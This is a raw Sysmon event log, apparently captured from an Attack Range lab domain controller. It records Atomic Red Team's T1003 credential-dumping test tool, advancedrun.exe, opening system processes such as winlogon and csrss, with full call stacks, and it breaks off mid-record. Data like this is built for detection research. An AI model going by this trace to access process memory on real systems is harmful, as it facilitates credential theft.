Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bi